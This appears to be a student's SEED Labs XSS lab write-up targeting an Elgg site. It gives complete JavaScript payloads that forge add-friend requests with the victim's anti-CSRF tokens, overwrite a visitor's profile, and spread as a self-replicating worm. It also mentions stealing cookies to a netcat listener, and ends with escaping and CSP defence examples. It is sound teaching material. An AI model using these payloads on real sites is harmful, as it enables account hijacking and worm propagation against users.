SEED Labs 2.0: Cross-Site Scripting (XSS) Attack Lab

Task 1: Posting a Malicious Message to Display an Alert Window

Log in as alice, edit the profile, embed a script in it, and save the profile.

Because the tags in the About me field include

the script cannot be embedded in About me; it can be embedded in Brief description instead.

After saving, the script can be seen running successfully.

If the script is long, the JavaScript has to be hosted on our own server and referenced from the profile through a src attribute.

Task 2: Posting a Malicious Message to Display Cookies

This is simply Task 1 with alert("hello") replaced by alert(document.cookie).

Task 3: Stealing Cookies from the Victim’s Machine

Modify the JavaScript so that it sends the cookie to a port we are listening on. We listen with nc -lknv 5555.

After saving and visiting the profile, the request is sent to the remote server, while nothing is shown from the user's perspective.

The part marked by the arrow in the capture is the cookie value.

Task 4: Becoming the Victim’s Friend

In text mode, entering a character and then switching to HTML mode shows that it has been escaped.

We add alice as a friend from Samy's account and capture the request URL: http://www.seed-server.com/action/friends/add?friend=56&__elgg_ts=1698662057&__elgg_token=q3kjjkKfgKZHR7y00qMiXQ&__elgg_ts=1698662057&__elgg_token=q3kjjkKfgKZHR7y00qMiXQ

So the complete malicious code is:

<script type="text/javascript">
window.onload = function () {
// Elgg's anti-CSRF timestamp and token, read from the viewer's own session
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;

// The add-friend request captured above, with Samy as the friend
var sendurl="/action/friends/add?friend=59" + ts + token + ts + token;
if (elgg.session.user.guid != 47) {
var Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("X-Requested-With","XMLHttpRequest");
Ajax.send();
}
}
</script>

Insert the code into the profile.

Visit Samy's profile as alice.

alice has now been added as a friend.

Q1: These two lines are there to get past the Elgg server's validation.

Q2: No. The code is escaped into text content and cannot be executed as a script.
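As an added example (not Elgg's code or part of the lab), here is the rendering difference the answer above rests on: the Brief description field interpolated raw versus HTML-entity-encoded, using the Task 1 payload as a constructed input.

```javascript
// Added example, not Elgg's code: the same profile-field rendering done the
// unsafe way (raw interpolation) and the safe way (HTML entity encoding),
// which is what the editor's text mode did to the payload in Task 4.

// The Task 1 payload and a harmless description, constructed here as inputs.
const XSS_PAYLOAD = '<script type="text/javascript">alert("hello")</script>';
const BENIGN = 'Tom & Jerry <3';

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change meaning inside HTML text
// or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => ENTITIES[ch]);
}

// Unsafe: the stored field goes into the markup untouched, so a stored
// <script> tag is parsed as a tag and executed on every profile view.
function renderBriefDescriptionUnsafe(field) {
  return `<div class="briefdescription">${field}</div>`;
}

// Safe: the parser sees only text; the visitor reads the literal
// characters and nothing executes.
function renderBriefDescriptionSafe(field) {
  return `<div class="briefdescription">${escapeHtml(field)}</div>`;
}

// Crude marker used only to illustrate the difference: does the markup
// still contain a script opening tag the parser would act on?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```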

Task 5: Modifying the Victim’s Profile

Implement the Ajax request in JavaScript and insert it into the profile.

<script type="text/javascript">
window.onload = function(){
// The viewer's own name and guid, required by the profile edit form
var userName="&name="+elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
// Elgg's anti-CSRF timestamp and token from the viewer's session
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;

// Form body: sets the description field and makes it public (access level 2)
var content=token + ts + userName +
"&description=samy%20is%20a%20handsome%20man&accesslevel[description]=2" +guid;
var samyGuid=59;
var sendurl="http://www.seed-server.com/action/profile/edit";

// The check Question 3 asks about: do nothing when Samy views his own profile
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>

First confirm that alice's profile is empty, then visit Samy's profile again.

A sentence has now been added to the profile.

Question 3: Why do we need Line 14? Remove this line, and repeat your attack. Report and explain your observation.

This line keeps the attacker's own profile from being overwritten, which would otherwise cause the attack to fail.

Task 6: Writing a Self-Propagating XSS Worm

Edit the profile so that the code copies itself into other users' profiles.

<script id="worm">
// Rebuild the worm's own source from the DOM so that it can copy itself
var headerTag = "<script id=\"worm\" type=\"text/javascript\">";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
// URL-encode the complete script tag so it survives the form body
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
window.onload = function(){
// The viewer's own name, guid and anti-CSRF token, as in Task 5
var userName="&name="+elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;

// description carries the worm itself; briefdescription carries the visible message
var content=token + ts + userName +
"&description=" + wormCode + "&accesslevel[description]=2" +
"&briefdescription=samy%20is%20a%20handsome%20man&accesslevel[briefdescription]=2" +guid;
var samyGuid=59;
var sendurl="http://www.seed-server.com/action/profile/edit";

// Skip Samy's own profile so the original copy is not overwritten
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>

After alice visits Samy's profile, her profile information has been modified.

Visiting alice's profile as Boby shows that it has been modified as well.

Task 7: Defeating XSS Attacks Using CSP

1. Describe and explain your observations when you visit these websites.

http://www.example60.com/

http://www.example70.com/

http://www.example32a.com/ all display OK for every source, meaning every source has been added to the allowlist.

http://www.example32b.com trusts only scripts from example70 and from itself.

http://www.example32c.com/ trusts only scripts from example70, from itself, and those carrying the nonce 111-111-1111.

2. Click the button in the web pages from all the three websites, describe and explain your observations.

Only http://www.example60.com/, http://www.example70.com/ and http://www.example32a.com/ execute the button's script successfully.

3. Change the server configuration on example32b (modify the Apache configuration), so Areas 5 and 6 display OK. Please include your modified configuration in the lab report.

4. Change the server configuration on example32c (modify the PHP code), so Areas 1, 2, 4, 5, and 6 all display OK. Please include your modified configuration in the lab report.

5. Please explain why CSP can help prevent Cross-Site Scripting attacks.

CSP adds a mechanism of trusted sources: the browser executes only script that comes from a trusted site, so injected code that has no trusted origin or nonce is not run.
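As an added example (not the lab's configuration files or any browser's implementation), the following simplified evaluator for the script-src directive shows which scripts each policy lets run. The policy strings are constructed from the trust rules described in question 1 (self plus example70 for example32b, self plus example70 plus the nonce 111-111-1111 for example32c); the wildcard form `*.example70.com` and the question 3 fix that adds example60 are assumptions.

```javascript
// Added example, not the lab's own configuration or Elgg code: a simplified
// evaluator for the script-src directive of a Content-Security-Policy header.

// Policies constructed from the trust rules the write-up describes (assumed
// to use wildcard host sources); the real lab headers may differ in detail.
const CSP_32B = "default-src 'self'; script-src 'self' *.example70.com";
const CSP_32C = "default-src 'self'; script-src 'self' *.example70.com 'nonce-111-111-1111'";
// Assumed fix for question 3: additionally allow scripts served by example60.
const CSP_32B_FIXED = CSP_32B + " *.example60.com";

function scriptSources(policy) {
  const d = policy.split(';').map(s => s.trim()).find(s => s.startsWith('script-src'));
  return d ? d.split(/\s+/).slice(1) : [];
}

// Host-source matching: a leading "*." covers the domain and its subdomains.
function hostMatches(source, host) {
  const pattern = source.replace(/^https?:\/\//, '').split('/')[0];
  if (pattern.startsWith('*.')) {
    const base = pattern.slice(2);
    return host === base || host.endsWith('.' + base);
  }
  return host === pattern;
}

// script is {src} for an external script or {inline: true, nonce?} for an
// inline <script> block; pageHost is the hostname serving the document.
function scriptAllowed(policy, pageHost, script) {
  const sources = scriptSources(policy);
  if (script.inline) {
    // Inline code runs only with a matching nonce (or the weak 'unsafe-inline').
    if (sources.includes("'unsafe-inline'")) return true;
    return script.nonce !== undefined && sources.includes(`'nonce-${script.nonce}'`);
  }
  const host = new URL(script.src).hostname;
  return sources.some(s => {
    if (s === "'self'") return host === pageHost;
    if (s.startsWith("'")) return false;  // keywords and nonces never match a host
    return hostMatches(s, host);
  });
}

// A payload injected through a profile field, as in Tasks 1 to 6, is an
// inline script that carries no nonce; this is why CSP stops it.
function injectedScriptRuns(policy, pageHost) {
  return scriptAllowed(policy, pageHost, { inline: true });
}
```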